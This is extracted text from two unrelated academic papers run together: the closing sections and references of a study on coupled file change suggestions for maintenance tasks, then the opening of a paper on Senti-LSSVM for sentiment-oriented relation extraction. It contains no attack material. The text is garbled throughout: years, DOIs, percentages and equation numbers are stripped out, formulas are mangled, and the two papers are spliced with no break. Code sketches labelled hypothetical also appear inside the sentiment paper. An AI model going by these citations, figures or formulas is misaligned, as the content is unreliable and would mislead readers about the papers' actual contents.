approach uses mapping between the commits and the issues which excludes the projects not using them. however, this practice is used very often today. we can find many projects in various on-line software repository collections like github using this kind of mapping and providing issue and project description. we chose simple perfective tasks that can be easily replicated and do not require large changes in the source code. the description of the tasks is simple and includes the source code functionalities to be changed and the activities without any specific format or structure. this way we maintain the possibility to repeat the process for other projects and limit the possibility of creating artificial conditions specially tailored for our experiment. yet, it is not clear whether the results can be generalized for other types of maintenance tasks. the student participants in the experiment have basic programming experience which corresponds to the target group of our study to address inexperienced developers. the system we used for the experiment is an open source java project with a clear project structure and repository. it does not contain specific information that can challenge the replication of the analysis. conclusion and future work from the provided results, we summarize that the coupled file change approach was successfully tested in the performed experiment. 
the participants working with coupled change suggestions provided significantly more correct solutions than the participants without these suggestions. the participants using coupled file change suggestions did not manage to solve their tasks significantly faster in comparison to the participants working only with the issue descriptions. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we conclude that the coupled file change suggestions can be positively judged to be useful for inexperienced developers working on perfective maintenance tasks. the influence is particularly positive on the correctness of the solutions. the influence of the coupled change suggestions on the effort for solving the tasks is much lower than on the correctness of the solutions. considering the time needed for the selection of the coupled files as part of the task solution procedure, the use of the coupled files does not give any advantage. we extended the findings of ramadani & wagner ( ) where the participants judged the coupled file changes and the attributes as neutral to use in maintenance tasks. our experiment outcomes are more positive compared to the results in ramadani & wagner ( ). working on real maintenance tasks and a real software product increases the acceptance of coupled change suggestions by the developers. also, we rounded up the set of useful attributes based on the set of attributes presented in this study. the next steps would be to transform the results and the findings into full-fledged tool implementation to support the developers working on maintenance tasks with the visual presentation of suggestions of the files they should also change. the final set of attributes presented in the tool should be adjustable so the developers will not be overwhelmed with information which could negate the positive effect we have found in this study. acknowledgements we would like to thank dr. asim abdulkhaleq for his help in the evaluation of the coupled files, the tasks and their solutions, the process of scoring and the analysis of the questionnaires. we also thank nakharin donsupae, dominik kesim and adrian weller for their help in the process of selecting the coupled files. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • jasmin ramadani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • stefan wagner conceived and designed the experiments, performed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data has been supplied as a supplementary file. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abran a, nguyenkim h. . analysis of maintenance work categories through measurement. in: proceedings of the international conference on software maintenance. washington, d.c.: ieee, – doi . /icsm. . . agrawal r, srikant r. . 
fast algorithms for mining association rules in large databases. in: bocca jb, jarke m, zaniolo c, eds. proceedings of the international conference on very large data bases. san francisco: morgan kaufmann publishers inc., – . armstrong ra. . when to use the bonferroni correction. ophthalmic and physiologi- cal optics ( ): – doi . /opo. . basili vr. . viewing maintenance as reuse-oriented software development. ieee software : – doi . / . . basili vr, caldiera g, rombach hd. . the goal question metric approach. in: encyclopedia of software engineering. los alamitos: john wiley and sons, inc. bavota g, dit b, oliveto r, di penta m, poshyvanyk d, de lucia a. . an empirical study on the developers perception of software coupling. in: notkin d, cheng bhc, pohl k, eds. proceedings of the international conference on software engineering. washington, d.c.: ieee, – . bieman j, andrews a, yang h. . understanding change-proneness in oo software through visualization. in: proceedings of the ieee international workshop on program comprehension. washington, d.c.: ieee, – doi . /wpc. . . bird c, rigby pc, barr et, hamilton dj, germán dm, devanbu pt. . the promises and perils of mining git. in: proceedings of the working conference on mining software repositories. washington, d.c.: ieee, – doi . /msr. . . briand l, morasca s, basili v. . an operational process for goal-driven defi- nition of measures. ieee transactions on software engineering : – doi . /tse. . . canfora g, cerulo l. . impact analysis by mining software and change request repositories. in: proceedings of the ieee international software metrics symposium (metrics’ ). washington, d.c.: ieee, – doi . /metrics. . . carlsson e. . mining git repositories: an introduction to repository mining. available at https://www.diva-portal.org/smash/get/diva : /fulltext .pdf (accessed on march ). chan t. . impact of programming and application-specific knowledge on mainte- nance effort: a hazard rate model. in: proceedings of the ieee international conference on software maintenance. beijing: ieee, – doi . /icsm. . . ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /icsm. . http://dx.doi.org/ . /opo. http://dx.doi.org/ . / . http://dx.doi.org/ . /wpc. . http://dx.doi.org/ . /msr. . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /metrics. . https://www.diva-portal.org/smash/get/diva : /fulltext .pdf http://dx.doi.org/ . /icsm. . http://dx.doi.org/ . /peerj-cs. cohen j. . statistical power analysis for the behavioral sciences. l hillsdale: lawrence erlbaum associates. coolican h, taylor f. . research methods and statistics in psychology. london: hodder education. d’ambros m, lanza m, robbes r. . on the relationship between change coupling and software defects. in: proceedings of the working conference on reverse engineering. washington, d.c.: ieee, – doi . /wcre. . . de lucia a, pompella e, stefanucci s. . effort estimation for corrective software maintenance. in: proceedings of the international conference on software engineering and knowledge engineering. new york: association for computing machinery, – doi . / . . fischer m, pinzger m, gall h. . populating a release history database from version control and bug tracking systems. in: proceedings of the international conference on software maintenance. washington, d.c.: ieee, doi . /icsm. . . fluri b, gall h, pinzger m. . 
fine-grained analysis of change couplings. in: pro- ceedings of the ieee international workshop on source code analysis and manipulation. washington, d.c.: ieee, – doi . /scam. . . fournier-viger p. . how to auto-adjust the minimum support threshold according to the data size. available at http://data-mining.philippe-fournier-viger.com/ (accessed on march ). fritz co, morris pe, richler jj. . effect size estimates: current use, calcula- tions, and interpretation. journal of experimental psychology: general : – doi . /a . gall h, hajek k, jazayeri m. . detection of logical coupling based on product release history. in: proceedings of the international conference on software maintenance. washington, d.c.: ieee, doi . /icsm. . . gall h, jazayeri m, krajewski j. . cvs release history data for detecting logical couplings. in: proceedings of the international workshop on principles of software evolution. washington, d.c.: ieee, – doi . /iwpse. . . german dm. . mining cvs repositories, the softchange experience. in: pro- ceedings of the international workshop on mining software repositories. – doi . /ic: . györödi c, györödi r. . a comparative study of association rules mining algo- rithms. available at http://citeseerx.ist.psu.edu/viewdoc/download?doi= . . . . rep=rep type=pdf (accessed on march ). han j. . data mining: concepts and techniques. burlington: morgan kaufmann publishers inc. han j, pei j, yin y. . mining frequent patterns without candidate genera- tion. in: proceedings of the acm sigmod international conference on man- agement of data. new york: association for computing machinery, – doi . / . . ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /wcre. . http://dx.doi.org/ . / . http://dx.doi.org/ . /icsm. . http://dx.doi.org/ . /scam. . http://data-mining.philippe-fournier-viger.com/ http://dx.doi.org/ . /a http://dx.doi.org/ . /icsm. . http://dx.doi.org/ . /iwpse. . http://dx.doi.org/ . /ic: http://citeseerx.ist.psu.edu/viewdoc/download?doi= . . . . rep=rep type=pdf http://citeseerx.ist.psu.edu/viewdoc/download?doi= . . . . rep=rep type=pdf http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. hanlon b, larget b. . analysis of variance. available at http://www.stat.wisc.edu/ ~st - / -anova- .pdf (accessed on june ). hassan ae. . the road ahead for mining software repositories. in: frontiers of software maintenance, . fosm . washington, d.c.: ieee, – . hassan ae, holt rc. . predicting change propagation in software systems. in: proceedings of the ieee international conference on software maintenance. washington, d.c.: ieee, – doi . /icsm. . . hattori l, dos santos jr g, cardoso f, sampaio m. . mining software repositories for software change impact analysis: a case study. in: proceedings of the brazilian symposium on databases. porto alegre: sociedade brasileira de computação, – . hindle a, german dm, holt r. . what do large commits tell us?: a taxonomical study of large commits. in: proceedings of the international working conference on mining software repositories. new york: association for computing machinery, – doi . / . . hutton a, welland r. . an experiment measuring the effects of maintenance tasks on program knowledge. in: kitchenham b, brereton p, turner m, eds. proceedings of the international conference on evaluation and assessment in software engineering. london: british computer society, – . ieee. . ieee standard for software maintenance. ieee std - . washington, d.c.: ieee. 
iso/iec iso/iec : software engineering-software maintenance. . available at https://www.iso.org/standard/ .html (accessed on march ). iso/iec iso/iec : information technology-software life cycle processes. . available at https://www.iso.org/standard/ .html (accessed on march ). kagdi h. . improving change prediction with fine-grained source code mining. in: proceedings of the ieee/acm international conference on automated software engineering. washington, d.c.: ieee, – doi . / . . kagdi h, yusuf s, maletic ji. . mining sequences of changed-files from version histories. in: proceedings of the international workshop on mining software repositories. washington, d.c.: ieee, – doi . / . . lientz bp, swanson eb. . software maintenance management. boston: addison- wesley longman publishing co., inc. nachar n. . the mann–whitney u: a test for assessing whether two independent samples come from the same distribution. tutorials in quantitative methods for psychology : – doi . /tqmp. . .p . nguyen v, boehm b, danphitsanuphan p. . a controlled experiment in assessing and estimating software maintenance tasks. information and software technology : – doi . /j.infsof. . . . pigoski tm. . practical software maintenance: best practices for managing your software investment. st edition. hoboken: wiley publishing. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.stat.wisc.edu/~st - / -anova- .pdf http://www.stat.wisc.edu/~st - / -anova- .pdf http://dx.doi.org/ . /icsm. . http://dx.doi.org/ . / . https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /tqmp. . .p http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /peerj-cs. pohlert t. . the pairwise multiple comparison of mean ranks package. available at https://cran.r-project.org/web/packages/pmcmr/vignettes/pmcmr.pdf (accessed on march ). purushothaman r, perry de. . toward understanding the rhetoric of small source code changes. ieee transactions on software engineering ( ): – doi . /tse. . . ramadani j, wagner s. . are suggestions of coupled file changes interesting? in: maciaszek l, filipe j, eds. proceedings of the international conference on evaluation of novel software approaches to software engineering. setúbal: enase, – doi . / . revelle m, gethers m, poshyvanyk d. . using structural and textual information to capture feature coupling in object-oriented software. empirical software engineering : – doi . /s - - - . ricca f, leotta m, reggio g, tiso a, guerrini g, torchiano m. . using unimod for maintenance tasks: an experimental assessment in the context of model driven development. in: proceedings of the international workshop on modeling in software engineering. piscataway: ieee press, – doi . /mise. . . shelly gb, cashman tj, rosenblatt hj. . systems analysis and design. rd edition. cambridge: international thomson publishing. shirabad j, lethbridge t, matwin s. . mining the maintenance history of a legacy software system. in: proceedings of the international conference on software mainte- nance. washington, d.c.: ieee, – doi . /icsm. . . stafford ja. . software maintenance as part of the software life cycle. available at http://hepguru.com/maintenance/final_ _v .pdf (accessed on march ). stevens wp, myers gj, constantine ll. . structured design. ibm systems journal : – doi . /sj. . . swanson eb. . the dimensions of maintenance. in: proceedings of the international conference on software engineering. 
los alamitos: ieee, – . tomczak m, tomczak e. . the need to report effect size estimates revisited. an overview of some recommended measures of effect size. trends in sport sciences : – . van rysselberghe f, demeyer s. . mining version control systems for facs (frequently applied changes). in: hassan ae, holt rc, mockus a, eds. proceedings of the international workshop on mining repositories. – . van vliet h, van vliet h, van vliet j. . software engineering: principles and practice. new york: wiley. wu r, zhang h, kim s, cheung s-c. . relink: recovering links between bugs and changes. in: proceedings of the acm sigsoft symposium and the th european con- ference on foundations of software engineering. new york: association for computing machinery, – doi . / . . ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cran.r-project.org/web/packages/pmcmr/vignettes/pmcmr.pdf http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /mise. . http://dx.doi.org/ . /icsm. . http://hepguru.com/maintenance/final_ _v .pdf http://dx.doi.org/ . /sj. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. ying att, murphy gc, ng rt, chu-carroll m. . predicting source code changes by mining change history. ieee transactions on software engineering : – doi . /tse. . . zimmermann t, kim s, zeller a, whitehead jr ej. . mining version archives for co-changed lines. in: proceedings of the international workshop on mining software repositories. new york: association for computing machinery, – doi . / . . zimmermann t, weisgerber p, diehl s, zeller a. . mining version histories to guide software changes. in: proceedings of the international conference on soft- ware engineering. new york: association for computing machinery, – doi . / . . ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. senti-lssvm: sentiment-oriented multi-relation extraction with latent structural svm lizhen qu max planck institute for informatics lqu@mpi-inf.mpg.de yi zhang nuance communications yi.zhang@nuance.com rui wang dfki gmbh mars @hotmail.com lili jiang max planck institute for informatics ljiang@mpi-inf.mpg.de rainer gemulla max planck institute for informatics rgemulla@mpi-inf.mpg.de gerhard weikum max planck institute for informatics weikum@mpi-inf.mpg.de abstract extracting instances of sentiment-oriented re- lations from user-generated web documents is important for online marketing analysis. un- like previous work, we formulate this extrac- tion task as a structured prediction problem and design the corresponding inference as an integer linear program. our latent structural svm based model can learn from training cor- pora that do not contain explicit annotations of sentiment-bearing expressions, and it can si- multaneously recognize instances of both bi- nary (polarity) and ternary (comparative) re- lations with regard to entity mentions of in- terest. the empirical evaluation shows that our approach significantly outperforms state- of-the-art systems across domains (cameras and movies) and across genres (reviews and forum posts). the gold standard corpus that we built will also be a valuable resource for the community. 
introduction
sentiment-oriented relation extraction (choi et al., ) is concerned with recognizing sentiment polarities and comparative relations between entities from natural language text. identifying such relations often requires syntactic and semantic analysis at both the sentence and the phrase level. most prior work on sentiment analysis considers either i) subjective sentence detection (yu and kübler, ), ii) polarity classification (johansson and moschitti, ; wilson et al., ), or iii) comparative relation identification (jindal and liu, ; ganapathibhotla and liu, ). in practice, however, different types of sentiment-oriented relations frequently coexist in documents. in particular, we found that more than % of the sentences in our test corpus contain more than one type of relation. the isolated analysis approach is inappropriate because i) it sacrifices accuracy by ignoring the intricate interplay among different types of relations; ii) it could lead to conflicting predictions such as estimating a relation candidate as both negative and comparative. therefore, in this paper, we identify instances of both sentiment polarities and comparative relations for entities of interest simultaneously. we assume that all the mentions of entities and attributes are given, and that entities are disambiguated. it is a widely used assumption when evaluating a module in a pipeline system that the outputs of preceding modules are error-free.

to the best of our knowledge, the only existing system capable of extracting both comparisons and sentiment polarities is the rule-based system proposed by ding et al. ( ). we argue that it is better to tackle the task by using a unified model with structured outputs. it allows us to consider a set of correlated relation instances jointly and characterize their interaction through a set of soft and hard constraints. for example, we can encode constraints to discourage an attribute from participating in a polarity relation and a comparative relation at the same time. as a result, the system extracts a set of correlated instances of sentiment-oriented relations from a given sentence. for example, for the sentence about the camera canon d, "the sensor is great, but the price is higher than nikon d .", the expected output is positive(canon d, sensor) and preferred(nikon d , canon d, price).

however, constructing a fully annotated training corpus for this task is labor-intensive and requires a strong linguistic background. we minimize this overhead by applying a simplified annotation scheme, in which annotators mark mentions of entities and attributes, disambiguate the entities, and label instances of relations for each sentence. based on the new scheme, we have created a small sentiment relation graph (srg) corpus for the domains of cameras and movies, which significantly differs from the corpora used in prior work (wei and gulla, ; kessler et al., ; toprak et al., ; wiebe et al., ; hu and liu, ) in the following ways: i) both sentiment polarities and comparative relations are annotated; ii) all mentioned entities are disambiguated; and iii) no subjective expressions are annotated, unless they are part of entity mentions.
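as a rough illustration of what the simplified annotation scheme yields for a single sentence, the record below sketches one possible encoding of the marked mentions and labeled relation instances; the field names and the entity names are hypothetical and do not reflect the actual corpus format.

    # hypothetical shape of one srg-style annotation record (not the corpus's actual format)
    annotation = {
        "sentence": "the sensor is great, but the price is higher than camera_b.",
        "mentions": [
            {"text": "camera_a", "kind": "entity", "from_context": True},
            {"text": "sensor", "kind": "attribute"},
            {"text": "price", "kind": "attribute"},
            {"text": "camera_b", "kind": "entity"},
        ],
        "relations": [
            {"type": "positive", "entity": "camera_a", "attribute": "sensor"},
            {"type": "preferred", "preferred": "camera_b", "over": "camera_a", "attribute": "price"},
        ],
    }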
the new annotation scheme raises a new chal- lenge for learning algorithms in that they need to automatically find textual evidences for each anno- tated relation during training. for example, with the sentence “i like the rebel a little better, but that is another price jump”, simply assigning a sentiment- bearing expression to the nearest relation candidate is insufficient, especially when the sentiment is not explicitly expressed. in this paper, we propose senti-lssvm, a latent structural svm based model for sentiment-oriented relation extraction. senti-lssvm is applied to find the most likely set of the relation instances expressed in a given sentence, where the latent variables are used to assign the most appropriate textual evidences to the respective instances. in summary, the contributions of this paper are the following: • we propose senti-lssvm: the first unified sta- tistical model with the capability of extracting instances of both binary and ternary sentiment- oriented relations. • we design a task-specific integer linear pro- gramming (ilp) formulation for inference. • we construct a new srg corpus as a valuable asset for the evaluation of sentiment relation extraction. • we conduct extensive experiments with on- line reviews and forum posts, showing that senti-lssvm model can effectively learn from a training corpus without explicitly annotated subjective expressions and that its performance significantly outperforms state-of-the-art sys- tems. related work there are ample works on analyzing sentiment po- larities and entity comparisons, but the majority of them studied the two tasks in isolation. most prior approaches for fine-grained sentiment analysis focus on polarity classification. super- vised approaches on expression-level analysis re- quire the annotation of sentiment-bearing expres- sions as training data (jin et al., ; choi and cardie, ; johansson and moschitti, ; yessenalina and cardie, ; wei and gulla, ). however, the corresponding annotation pro- cess is time-consuming. although sentence-level annotations are easier to obtain, the analysis at this level cannot cope with sentences conveying relations of multiple types (mcdonald et al., ; täckström and mcdonald, ; socher et al., ). lexicon- based approaches require no training data (ku et al., ; kim and hovy, ; godbole et al., ; ding et al., ; popescu and etzioni, ; liu et al., ) but suffer from inferior performance (wil- son et al., ; qu et al., ). in contrast, our method requires no annotation of sentiment-bearing expressions for training and can predict both senti- ment polarities and comparative relations. sentiment-oriented comparative relations have been studied in the context of user-generated dis- course (jindal and liu, ; ganapathibhotla and liu, ). approaches rely on linguistically moti- vated rules and assume the existence of independent keywords in sentences which indicate comparative relations. therefore, these methods fall short of ex- tracting comparative relations based on domain de- pendent information. both johansson and moschitti ( ) and wu et al. ( ) formulate fine-grained sentiment analy- sis as a learning problem with structured outputs. however, they focus only on polarity classification of expressions and require annotation of sentiment- bearing expressions for training as well. 
while ilp has been previously applied for infer- ence in sentiment analysis (choi and cardie, ; somasundaran and wiebe, ; wu et al., ), our task requires a complete ilp reformulation due to ) the absence of annotated sentiment expressions and ) the constraints imposed by the joint extrac- tion of both sentiment polarity and comparative re- lations. system overview this section gives an overview of the whole system for extracting sentiment-oriented relation instances. prior to presenting the system architecture, we in- troduce the essential concepts and the definitions of two kinds of directed hypergraphs as the represen- tation of correlated relation instances extracted from sentences. . concepts and definitions entity. an entity is an abstract or concrete thing, which needs not be of material existence. an entity in this paper refers to either a product or a brand. attribute. an attribute is an object closely associ- ated with or belonging to an entity, such as the lens of digital camera. sentiment-oriented relation. a sentiment- oriented relation is either a sentiment polarity or a comparative relation, defined on tuples of entities and attributes. a sentiment polarity relation conveys either a positive or a negative attitude towards enti- ties or their attributes, whereas a comparative rela- tion indicates the preference of one entity over the other entity w.r.t. an attribute. relation instance. an instance of sentiment polar- ity takes the form r(entity, attribute) with r ∈ {pos- itive, negative}, such as positive(canon d, sen- sor). the polarity instances expressed in the form of unary relations, such as “nikon d is ex- cellent.”, are denoted as binary relations r(entity, whole), where the attribute whole indicates the en- tity as a whole. in contrast, an instance of compar- ative relation is in the form of preferred{entity, en- tity, attribute}, e.g. preferred(canon d, nikon d , price). for brevity, we refer to an instance set of sentiment-oriented relations extracted from a sentence as an ssor. to represent the instances of the remaining relations, we represent them as other{entity, attribute}, such as textitpartof{wheel, car}. these relations include objective relations and the subjective relations other than sentiment- oriented relations. mention-based relation instances. a mention- based relation instance refers to a tuple of entity mentions with a certain relation. this concept is in- troduced as the representation of instances in a sen- tence by replacing entities with the corresponding entity mentions, such as positive(“canon sd i”, “wide angle view”). figure : an example of mrg. mention-based relation graph. a mention-based relation graph (or mrg ) represents a collection of mention-based relation instances expressed in a sen- tence. as illustrated in figure , an mrg is a di- rected hypergraph g = 〈m,e〉 with a vertex set m and an edge set e. a vertex mi ∈ m denotes a mention of an entity or an attribute occurring ei- ther within the sentence or in its context. we say that a mention is from the context if it is mentioned in the previous sentence or is an attribute implied in the current sentence. an instance of a binary re- lation in an mrg takes the form of a binary edge el = (mi,ma), where mi and ma denote an en- tity mention and an attribute mention respectively, and the type l ∈ {positive, negative, other}. 
a ternary edge el indicating comparative relation is represented as el = (mi,mj,ma), where two en- tity mentions mi and mj are compared with respect to the attribute mention ma. we define the type l ∈ {better,worse} to indicate two possible direc- tions of the relation and assume mi occurs before mj. as a result, we have a set l of five relation types: positive, negative, better, worse or other. ac- cording to these definitions, the annotations in the srg corpus are actually mrgs and disambiguated entities. if there are multiple mentions referring to the same entity, annotators are asked to choose the most obvious one because it saves annotation time and is less demanding for the entity recognition and diambiguation modules. figure : an example of emrg. the textual evi- dences are wrapped by green dashed boxes. evidentiary mention-based relation graph. an evidentiary mention-based relation graph, coined emrg , extends an mrg by associating each edge with a textual evidence to support the corresponding relation assertions (see figure ). consequently, an edge in an emrg is denoted by a pair (a,c), where a represents a mention-based relation instance and c is the associated textual evidence. it is also re- ferred to as an evidentiary edge. represented as el = (mi,mj,ma), an mrg as an evidentiary mrg (emrg) and the edges of emrgs as evidentiary edges, as shown in figure . . system architecture figure : system architecture. as illustrated by figure , at the core of our sys- tem is the senti-lssvm model, which extracts sets of mention-based relationships in the form of emrgs from sentences. for a given sentence with known entity mentions, we select all possible mention sets as relation candidates, where each set includes at least one entity mention. then we associate each relation candidate with a set of constituents or the whole sentence as the textual evidence candidates (cf. section . ). subsequently, the inference com- ponent aims to find the most likely emrg from all possible combinations of mention-based relation in- stances and their textual evidences (cf. section . ). the representation emrg is chosen because it char- acterizes exactly the model outputs by letting each edge correspond to an instance of mention-based re- lation and the associated textual evidence. finally, the model parameters of this model are learned by an online algorithm (cf. section ). since instance sets of sentiment-oriented relations (ssors) are the expected outputs, we can obtain ssors from mrgs by using a simple rule-based al- gorithm. the algorithm essentially maps the men- tions from an mrg into entities and attributes in an ssor and label the corresponding tuples with the re- lation types of the edges from an mrg. for instances of comparative relation, the label better or worse is mapped to the relation type preferred. senti-lssvm model the task of sentiment-oriented relation extraction is to determine the most likely ssor in a sentence. since ssors are derived from the corresponding mrgs as described in section , the task is reduced to find the most likely mrg for each sentence. since an mrg is created by assigning relation types to a subset of all relation candidates, which are possible tuples of mentions with unknown relation types, the number of mrgs can be extremely high. to tackle the task, one solution is to employ an edge-factored linear model in the framework of structural svm (martins et al., ; tsochantaridis et al., ). 
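before the formal model is laid out below, the sketch shows one way such an edge-factored linear model can be pictured in code: mention and edge structures for an mrg, a bag of unigram-style features per candidate edge, and a dot product with a weight vector. everything here (class names, feature templates, weights) is our own hypothetical illustration, not the published implementation.

    # hypothetical illustration of an edge-factored linear score over mrg edges;
    # none of these names come from the published system.
    from dataclasses import dataclass
    from typing import Optional
    from collections import Counter

    @dataclass(frozen=True)
    class Mention:
        text: str
        kind: str                                  # "entity" or "attribute"

    @dataclass(frozen=True)
    class Edge:
        label: str                                 # positive, negative, better, worse, other
        entity: Mention
        attribute: Mention
        second_entity: Optional[Mention] = None    # set only for ternary (comparative) edges

    def edge_features(edge, evidence_tokens):
        """bag of unigram features for one candidate edge and its textual evidence."""
        feats = Counter()
        for tok in evidence_tokens:
            feats[f"unigram={tok}|label={edge.label}"] += 1.0
        feats[f"bias|label={edge.label}"] = 1.0
        return feats

    def score_edge(weights, edge, evidence_tokens):
        """dot product between the edge's feature vector and the weight vector."""
        return sum(weights.get(f, 0.0) * v
                   for f, v in edge_features(edge, evidence_tokens).items())

    # toy usage with made-up weights
    e = Edge("positive", Mention("camera_a", "entity"), Mention("sensor", "attribute"))
    w = {"unigram=great|label=positive": 1.2, "bias|label=positive": 0.1}
    print(score_edge(w, e, ["the", "sensor", "is", "great"]))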
the model suggests that a bag of features should be specified for each relation candidate, and then the model predicts the most likely candidate sets along with their relation types to form the optimal mrgs. as we observed, for a relation candidate, the most informative features are the words near its entity mentions in the original text. however, if we represent a candidate by all these words, it is very likely that the instances of different relation types share overly similar features, because a mention is often involved in more than one relation candidate, as shown in figure . as a consequence, the instances of different relations represented by overly similar features can easily confuse the learning algorithm. thus, it is critical to select proper constituents or sentences as textual evidences for each relation candidate in both training and testing.

consequently, we divide the task of sentiment-oriented relation extraction into two subtasks: i) identifying the most likely mrgs; ii) assigning proper textual evidences to each edge of the mrgs to support their relation assertions. it is desirable to carry out the two subtasks jointly as these two subtasks could enhance each other. first, the identification of relation types requires proper textual evidences; second, the soft and hard constraints imposed by the correlated relation instances facilitate the recognition of the corresponding textual evidences. since the emrgs are created by attaching to every mrg a set of textual evidences, tackling the two subtasks simultaneously is equivalent to selecting the most likely emrg from a set of emrg candidates. it is challenging because our srg corpus does not contain any annotation of textual evidences.

formally, let X denote the set of all available sentences, and define y ∈ Y(x) (x ∈ X) as the set of labeled edges of an mrg, with Y = ∪_{x∈X} Y(x). since the assignments of textual evidences are not observed, an assignment of evidences to y is denoted by a latent variable h ∈ H(x), with H = ∪_{x∈X} H(x). then (y, h) corresponds to an emrg, and (a, c) ∈ (y, h) is a labeled edge a attached with a textual evidence c. given a labeled dataset D = {(x_1, y_1), ..., (x_n, y_n)} ∈ (X × Y)^n, we aim to learn a discriminant function f : X → Y × H that outputs the optimal emrg (y, h) ∈ Y(x) × H(x) for a given sentence x. due to the introduction of latent variables, we adopt the latent structural svm (yu and joachims, ) for structural classification. our discriminant function is defined as

f(x) = \operatorname{argmax}_{(y,h) \in Y(x) \times H(x)} \beta^{\top} \Phi(x, y, h)   ( )

where Φ(x, y, h) is the feature function of an emrg (y, h) and β is the corresponding weight vector. to ensure tractability, we also employ edge-based factorization for our model. let M_P denote a set of entity mentions and y_r(m_i) be the set of edges labeled with sentiment-oriented relations incident to m_i; the factorization of Φ(x, y, h) is given as

\Phi(x, y, h) = \sum_{(a,c) \in (y,h)} \Phi_e(x, a, c) + \sum_{m_i \in M_P} \sum_{a, a' \in y_r(m_i),\, a \neq a'} \Phi_c(a, a')   ( )

where Φ_e(x, a, c) is a local edge feature function for a labeled edge a attached with a textual evidence c, and Φ_c(a, a') is a feature function capturing the co-occurrence of two labeled edges a_{m_i} and a'_{m_i} incident to an entity mention m_i.

feature space
the following features are used in the feature functions (equation ):
unigrams: as mentioned before, a textual evidence attached to an edge in an mrg is either a word, phrase or sentence. we consider all lemmatized unigrams in the textual evidence as unigram features.
context: since web users usually express related sentiments about the same entity across sentence boundaries, we describe the sentiment flow using a set of contextual binary features. for example, if en- tity a is mentioned in both the previous sentence and the current sentence, a set of contextual binary fea- tures are used to indicate all possible combinations of the current and the previous mentioned sentiment- oriented relations regarding to entity a. co-occurrence: we have mentioned the co- occurrence feature in equation , indicated by Φc(a,a ′). it captures the co-occurrence of two la- beled edges incident to the same entity mention. note that the co-occurrence feature function is con- sidered only if there is a contrast conjunction such as “but” between the non-shared entity mentions inci- dent to the two labeled edges. senti-predictors: following the idea of (qu et al., ), we encode the prediction results from the rule-based phrase-level multi-relation predic- tor (ding et al., ) and from the bag-of-opinions predictor (qu et al., ) as features based on the textual evidence. the output of the first predictor is an integer value, while the output of the second predictor is a sentiment relation, such as “positive”, “negative”, “better” or “worse”. we map the rela- tional outputs into integer values and then encode the outputs from both predictors as senti-predictor features. others: the commonly used part-of-speech tags are also included as features. moreover, for an edge candidate, a set of binary features are used to denote the types of the edge and its entity mentions. for in- stance, a binary feature indicates whether an edge is a binary edge related to an entity mentioned in con- text. to characterize the syntactic dependencies be- tween two adjacent entity mentions, we use the path in the dependency tree between the heads of the cor- responding constituents, the number of words and other mentions in-between as features. additionally, if the textual evidence is a constituent, its feature w.r.t. an edge is the dependency path to the clos- est mention of the edge that does not overlap with this constituent. structural inference in order to find the best emrg for a given sentence with a well trained model, we need to determine the most likely relation type for each relation candi- date and support the corresponding assertions with proper textual evidences. we formulate this task as an integer linear programming (ilp). instead of considering all constituents of a sentence, we empir- ically select a subset as textual evidences for each relation candidate. . textual evidence candidates selection textual evidences are selected based on the con- stituent trees of sentences parsed by the stanford parser (klein and manning, ). for each men- tion in a sentence, we first locate a constituent in the tree with the maximal overlap by jaccard sim- ilarity. starting from this constituent, we consider two types of candidates: type i candidates are con- stituents at the highest level which contain neither any word of another mention nor any contrast con- junctions such as “but”; type ii candidates are con- stituents at the highest level which cover exactly two mentions of an edge and do not overlap with any other mentions. for a binary edge connecting an en- tity mention and an attribute mention, we consider a type i candidate starting from the attribute men- tion. for a binary edge connecting two entity men- tions, we consider type i candidates starting from both mentions. 
moreover, for a comparative ternary edge, we consider both type i and type ii candidates starting from the attribute mention. this strategy is based on our observation that these candidates of- ten cover the most important information w.r.t. the covered entity mentions. . ilp formulation we formulate the inference problem of finding the best emrg as an ilp problem due to its convenient integration of both soft and hard constraints. given the model parameters β, we reformulate the score of an emrg in the discriminant function ( ) as follows, β>Φ(x,y,h) = ∑ (a,c)∈(y,h) saczac + ∑ mi∈mp ∑ a,a′∈yr(mi),a =a′ saa′zaa′ where sac = β >Φe(x,a,c) denotes the score of a labeled edge a attached with a textual evidence c, saa′ = β >Φc(a,a ′) is the edge co-occurrence score, the binary variable zac indicates the presence or ab- sence of the corresponding edge, and zaa′ indicates if two edges co-occurr. as not every edge set can form an emrg, we require that a valid emrg should satisfy a set of linear constraints, which form our constraint space. then function ( ) is equivalent to max z∈b s>z + µzd s.t. a   z η τ   ≤ d z,η,τ ∈ b where b = s with s = { , }, and η and τ are auxiliary binary variables that help define the con- straint space. the above optimization problem takes exactly the form of an ilp because both the con- straints and the objective function are linear, and all variables take only integer values. in the following, we consider two types of con- straint space, ) an emrg with only binary edges and ) an emrg with both binary and ternary edges. emrg with only binary edges: an emrg has only binary edges if a sentence contains no attribute mention or at most one entity 